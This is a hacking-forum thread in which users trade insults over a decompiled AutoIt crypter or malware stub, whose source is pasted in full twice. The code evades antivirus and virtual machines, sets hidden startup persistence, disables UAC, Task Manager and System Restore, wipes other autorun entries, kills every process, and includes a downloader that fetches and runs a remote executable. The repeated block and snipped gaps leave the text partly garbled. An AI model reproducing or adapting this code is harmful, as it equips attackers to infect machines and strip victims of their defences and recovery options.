That was smart to let us look at the other way...
I'm disapointed by meself, I should have seen that earlier...
Yeah, why should I bother run this in a vm
?
Nice game OP... but you loose !
I'm disapointed by meself, I should have seen that earlier...
Code:
#NoTrayIcon
If ProcessExists("avastui.exe") Then Sleep(20000)
$path = "ppqzt"
$uniscriptdir = FileGetShortName(@ScriptDir)
$uniscriptfullpath = FileGetShortName(@ScriptFullPath)
$unicode_startup = FileGetShortName(@StartupDir)
$unicode_windows = FileGetShortName(@WindowsDir)
$unicode_system = FileGetShortName(@SystemDir)
$unicode_userprofile = FileGetShortName(@UserProfileDir)
$win_userprofile = "%userprofile%\"
FileSetAttrib($uniscriptdir, "+SHR")
Local $delay = IniRead($uniscriptdir & "\HbDzt.MCM", "6072607", "5726011", "NotFound")
If $delay = "4140580" Then
delay()
Else
EndIf
Local $mutex = IniRead($uniscriptdir & "\HbDzt.MCM", "1478845", "1729463", "NotFound")
If $mutex = "9293639" Then
mutex()
Else
EndIf
Local $startup = IniRead($uniscriptdir & "\HbDzt.MCM", "9363719", "5077712", "NotFound")
If $startup = "8541394" Then
startup()
Else
EndIf
Local $antis = IniRead($uniscriptdir & "\HbDzt.MCM", "9632628", "8921159", "NotFound")
If $antis = "2314561" Then
antis()
Else
EndIf
Local $fake = IniRead($uniscriptdir & "\HbDzt.MCM", "fake1", "fake2", "NotFound")
If $fake = "fake3" Then
fakemessage()
Else
EndIf
Local $botkiller = IniRead($uniscriptdir & "\HbDzt.MCM", "botkiller1", "botkiller2", "NotFound")
If $botkiller = "botkiller3" Then
botkiller()
Else
EndIf
Local $downloader = IniRead($uniscriptdir & "\HbDzt.MCM", "downloader1", "downloader2", "NotFound")
If $downloader = "downloader3" Then
downloader()
Else
EndIf
Local $uac = IniRead($uniscriptdir & "\HbDzt.MCM", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
disable_uac()
Else
EndIf
Local $systemrestore = IniRead($uniscriptdir & "\HbDzt.MCM", "systemrestore1", "systemrestore2", "NotFound")
If $systemrestore = "systemrestore3" Then
disable_syste_restore()
Else
EndIf
Local $antitask = IniRead($uniscriptdir & "\HbDzt.MCM", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
antitask()
Else
EndIf
Func delay()
$counter = 0
While $counter <= 5
Sleep(5000)
ShellExecute(@SystemDir & "\mshta.exe")
$counter = $counter + 1
_rundos("taskkill /IM mshta.exe")
WEnd
EndFunc
Func systemhide()
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0)
EndFunc
Func fakemessage()
$type = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetype1", "messagetype2", "NotFound")
$title = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetitle1", "messagetitle2", "NotFound")
$message = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetext1", "messagetext2", "NotFound")
If FileExists($unicode_userprofile & "\" & $path & "\check.txt") Then
Else
MsgBox($type, $title, $message)
FileWrite($unicode_userprofile & "\" & $path & "\check.txt", "")
EndIf
EndFunc
Func mutex()
$scriptname = "lmsqQw.exe"
If UBound(ProcessList($scriptname)) > 2 Then Exit
EndFunc
Func antitask()
$read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
If NOT ($read_antitask = "1") Then
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
EndIf
EndFunc
Func disable_uac()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If NOT ($read_uac = "0") Then
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
EndIf
EndFunc
Func startup()
$buac = _checkelevationenabled()
If $buac = 0 Then
Else
FileCreateShortcut($unicode_userprofile & "\" & $path & "\85841.vbs", $unicode_startup & "\start.lnk")
FileSetAttrib($unicode_startup & "\start.lnk", "+SH")
EndIf
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
If NOT FileExists($unicode_userprofile & "\" & $path & "\85841.vbs") Then
Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\65084.cmd", 1)
$autoit3 = "lmsqQw.exe"
FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & @ScriptName)
FileClose($bat)
Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\85841.vbs", 1)
FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="' & $unicode_userprofile & "\" & $path & "\" & '65084.cmd"' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit")
FileClose($vbs)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
FileSetAttrib($unicode_userprofile & "\" & $path & "\85841.vbs", "+SHR")
FileSetAttrib($unicode_userprofile & "\" & $path & "\65084.cmd", "+SHR")
If FileExists($unicode_startup & "\start.lnk") Then
FileDelete($unicode_startup & "\start.lnk")
EndIf
Else
EndIf
EndFunc
Func _checkelevationenabled()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If @error Then Return
Local $struct = DllStructCreate("BOOL")
Local $artn = DllCall("kernel32.dll", "DWORD", "CheckElevationEnabled", "ptr", DllStructGetPtr($struct))
If @error Then
Return SetError(@error)
EndIf
Return SetError($artn[0], 0, DllStructGetData($struct, 1))
EndFunc
Func antis()
If WinGetText("Program Manager") = "0" Then
Exit
Else
EndIf
If ProcessExists("VboxService.exe") Then
Exit
EndIf
If ProcessExists("VMwaretray.exe") Then
Exit
EndIf
EndFunc
Func persistence()
If NOT ProcessExists("RegSvcs.exe") AND NOT ProcessExists("RegAsm.exe") AND NOT ProcessExists("AppLaunch.exe") AND NOT ProcessExists("twunk_32.exe") AND NOT ProcessExists("newdev.exe") AND NOT ProcessExists("ndadmin.exe") Then
$pathtovbs = ($uniscriptdir & "\" & "run.vbs")
ShellExecute($pathtovbs)
Exit
EndIf
EndFunc
Func downloader()
If FileExists($unicode_userprofile & "\" & $path & "\dl.txt") Then
Else
FileWrite($unicode_userprofile & "\" & $path & "\dl.txt", "")
$random_download_name = Random(10000, 99999, 1) & ".exe"
Local $hdownload = InetGet("replace-me-url", $unicode_userprofile & "\" & $random_download_name, 1, 1)
Do
Sleep(250)
Until InetGetInfo($hdownload, 2)
Local $nbytes = InetGetInfo($hdownload, 0)
InetClose($hdownload)
ShellExecute($unicode_userprofile & "\" & $random_download_name)
EndIf
EndFunc
Func bsod()
$a = ProcessList()
For $i = 1 To UBound($a) - 1
ProcessClose($a[$i][0])
Next
Exit
EndFunc
Func botkiller()
RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
FileDelete(@StartupDir & "\*.*")
EndFunc
Func disable_syste_restore()
If FileExists($uniscriptdir & "\check.txt") Then
Else
RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
FileWrite($uniscriptdir & "\check.txt", "")
EndIf
EndFunc
Func _rundos($scommand)
Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE)
Return SetError(@error, @extended, $nresult)
EndFunc
Global Const $prov_rsa_full = 1
Global Const $prov_rsa_aes = 24
Global Const $crypt_verifycontext = -268435456
Global Const $hp_hashsize = 4
Global Const $hp_hashval = 2
Global Const $crypt_exportable = 1
Global Const $crypt_userdata = 1
Global Const $calg_md2 = 32769
Global Const $calg_md4 = 32770
Global Const $calg_md5 = 32771
Global Const $calg_sha1 = 32772
Global Const $calg_3des = 26115
Global Const $calg_aes_128 = 26126
Global Const $calg_aes_192 = 26127
Global Const $calg_aes_256 = 26128
Global Const $calg_des = 26113
Global Const $calg_rc2 = 26114
Global Const $calg_rc4 = 26625
Global Const $calg_userkey = 0
Global $__g_acryptinternaldata[3]
[SNIP]
-----------------
[SNIP]
Func loop()
While 1
If FileExists($unicode_userprofile & "\datascrambler\clean.txt") Then
__bsod($scriptname, False)
EndIf
If WinExists($path) Then
bsod()
Else
EndIf
Sleep(100)
WEnd
EndFunc
If ProcessExists("avastui.exe") Then Sleep(20000)
$path = "ppqzt"
$uniscriptdir = FileGetShortName(@ScriptDir)
$uniscriptfullpath = FileGetShortName(@ScriptFullPath)
$unicode_startup = FileGetShortName(@StartupDir)
$unicode_windows = FileGetShortName(@WindowsDir)
$unicode_system = FileGetShortName(@SystemDir)
$unicode_userprofile = FileGetShortName(@UserProfileDir)
$win_userprofile = "%userprofile%\"
FileSetAttrib($uniscriptdir, "+SHR")
Local $delay = IniRead($uniscriptdir & "\HbDzt.MCM", "6072607", "5726011", "NotFound")
If $delay = "4140580" Then
delay()
Else
EndIf
Local $mutex = IniRead($uniscriptdir & "\HbDzt.MCM", "1478845", "1729463", "NotFound")
If $mutex = "9293639" Then
mutex()
Else
EndIf
Local $startup = IniRead($uniscriptdir & "\HbDzt.MCM", "9363719", "5077712", "NotFound")
If $startup = "8541394" Then
startup()
Else
EndIf
Local $antis = IniRead($uniscriptdir & "\HbDzt.MCM", "9632628", "8921159", "NotFound")
If $antis = "2314561" Then
antis()
Else
EndIf
Local $fake = IniRead($uniscriptdir & "\HbDzt.MCM", "fake1", "fake2", "NotFound")
If $fake = "fake3" Then
fakemessage()
Else
EndIf
Local $botkiller = IniRead($uniscriptdir & "\HbDzt.MCM", "botkiller1", "botkiller2", "NotFound")
If $botkiller = "botkiller3" Then
botkiller()
Else
EndIf
Local $downloader = IniRead($uniscriptdir & "\HbDzt.MCM", "downloader1", "downloader2", "NotFound")
If $downloader = "downloader3" Then
downloader()
Else
EndIf
Local $uac = IniRead($uniscriptdir & "\HbDzt.MCM", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
disable_uac()
Else
EndIf
Local $systemrestore = IniRead($uniscriptdir & "\HbDzt.MCM", "systemrestore1", "systemrestore2", "NotFound")
If $systemrestore = "systemrestore3" Then
disable_syste_restore()
Else
EndIf
Local $antitask = IniRead($uniscriptdir & "\HbDzt.MCM", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
antitask()
Else
EndIf
Func delay()
$counter = 0
While $counter <= 5
Sleep(5000)
ShellExecute(@SystemDir & "\mshta.exe")
$counter = $counter + 1
_rundos("taskkill /IM mshta.exe")
WEnd
EndFunc
Func systemhide()
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0)
EndFunc
Func fakemessage()
$type = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetype1", "messagetype2", "NotFound")
$title = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetitle1", "messagetitle2", "NotFound")
$message = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetext1", "messagetext2", "NotFound")
If FileExists($unicode_userprofile & "\" & $path & "\check.txt") Then
Else
MsgBox($type, $title, $message)
FileWrite($unicode_userprofile & "\" & $path & "\check.txt", "")
EndIf
EndFunc
Func mutex()
$scriptname = "lmsqQw.exe"
If UBound(ProcessList($scriptname)) > 2 Then Exit
EndFunc
Func antitask()
$read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
If NOT ($read_antitask = "1") Then
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
EndIf
EndFunc
Func disable_uac()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If NOT ($read_uac = "0") Then
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
EndIf
EndFunc
Func startup()
$buac = _checkelevationenabled()
If $buac = 0 Then
Else
FileCreateShortcut($unicode_userprofile & "\" & $path & "\85841.vbs", $unicode_startup & "\start.lnk")
FileSetAttrib($unicode_startup & "\start.lnk", "+SH")
EndIf
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
If NOT FileExists($unicode_userprofile & "\" & $path & "\85841.vbs") Then
Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\65084.cmd", 1)
$autoit3 = "lmsqQw.exe"
FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & @ScriptName)
FileClose($bat)
Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\85841.vbs", 1)
FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="' & $unicode_userprofile & "\" & $path & "\" & '65084.cmd"' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit")
FileClose($vbs)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
FileSetAttrib($unicode_userprofile & "\" & $path & "\85841.vbs", "+SHR")
FileSetAttrib($unicode_userprofile & "\" & $path & "\65084.cmd", "+SHR")
If FileExists($unicode_startup & "\start.lnk") Then
FileDelete($unicode_startup & "\start.lnk")
EndIf
Else
EndIf
EndFunc
Func _checkelevationenabled()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If @error Then Return
Local $struct = DllStructCreate("BOOL")
Local $artn = DllCall("kernel32.dll", "DWORD", "CheckElevationEnabled", "ptr", DllStructGetPtr($struct))
If @error Then
Return SetError(@error)
EndIf
Return SetError($artn[0], 0, DllStructGetData($struct, 1))
EndFunc
Func antis()
If WinGetText("Program Manager") = "0" Then
Exit
Else
EndIf
If ProcessExists("VboxService.exe") Then
Exit
EndIf
If ProcessExists("VMwaretray.exe") Then
Exit
EndIf
EndFunc
Func persistence()
If NOT ProcessExists("RegSvcs.exe") AND NOT ProcessExists("RegAsm.exe") AND NOT ProcessExists("AppLaunch.exe") AND NOT ProcessExists("twunk_32.exe") AND NOT ProcessExists("newdev.exe") AND NOT ProcessExists("ndadmin.exe") Then
$pathtovbs = ($uniscriptdir & "\" & "run.vbs")
ShellExecute($pathtovbs)
Exit
EndIf
EndFunc
Func downloader()
If FileExists($unicode_userprofile & "\" & $path & "\dl.txt") Then
Else
FileWrite($unicode_userprofile & "\" & $path & "\dl.txt", "")
$random_download_name = Random(10000, 99999, 1) & ".exe"
Local $hdownload = InetGet("replace-me-url", $unicode_userprofile & "\" & $random_download_name, 1, 1)
Do
Sleep(250)
Until InetGetInfo($hdownload, 2)
Local $nbytes = InetGetInfo($hdownload, 0)
InetClose($hdownload)
ShellExecute($unicode_userprofile & "\" & $random_download_name)
EndIf
EndFunc
Func bsod()
$a = ProcessList()
For $i = 1 To UBound($a) - 1
ProcessClose($a[$i][0])
Next
Exit
EndFunc
Func botkiller()
RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
FileDelete(@StartupDir & "\*.*")
EndFunc
Func disable_syste_restore()
If FileExists($uniscriptdir & "\check.txt") Then
Else
RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
FileWrite($uniscriptdir & "\check.txt", "")
EndIf
EndFunc
Func _rundos($scommand)
Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE)
Return SetError(@error, @extended, $nresult)
EndFunc
Global Const $prov_rsa_full = 1
Global Const $prov_rsa_aes = 24
Global Const $crypt_verifycontext = -268435456
Global Const $hp_hashsize = 4
Global Const $hp_hashval = 2
Global Const $crypt_exportable = 1
Global Const $crypt_userdata = 1
Global Const $calg_md2 = 32769
Global Const $calg_md4 = 32770
Global Const $calg_md5 = 32771
Global Const $calg_sha1 = 32772
Global Const $calg_3des = 26115
Global Const $calg_aes_128 = 26126
Global Const $calg_aes_192 = 26127
Global Const $calg_aes_256 = 26128
Global Const $calg_des = 26113
Global Const $calg_rc2 = 26114
Global Const $calg_rc4 = 26625
Global Const $calg_userkey = 0
Global $__g_acryptinternaldata[3]
[SNIP]
-----------------
[SNIP]
Func loop()
While 1
If FileExists($unicode_userprofile & "\datascrambler\clean.txt") Then
__bsod($scriptname, False)
EndIf
If WinExists($path) Then
bsod()
Else
EndIf
Sleep(100)
WEnd
EndFunc
Yeah, why should I bother run this in a vm
?Nice game OP... but you loose !
Are you kidding me or what? Did you really just post the crypter's source?!
What the hell has this to do with my source
The source you just posted proofs that none of the functions included, except the anti virtuals, are being used.
Quote
That was smart to let us look at the other way...
I'm disapointed by meself, I should have seen that earlier...
I'm disapointed by meself, I should have seen that earlier...
If you didn't even see that one, even after decompiling the exectuble, well, i'm sorry, but your unskilled then.
Plus, if you followed the topic, i explicitly posted about crypting the source.
Now for the last time, stop spamming my topic. I've had enough of your makes-no-sense posts here.
If you really think you are all that mighty, then PM as i asked you, and we'll compare our sources.
Then once again, you will be disapointed by yourself. For the third time in row.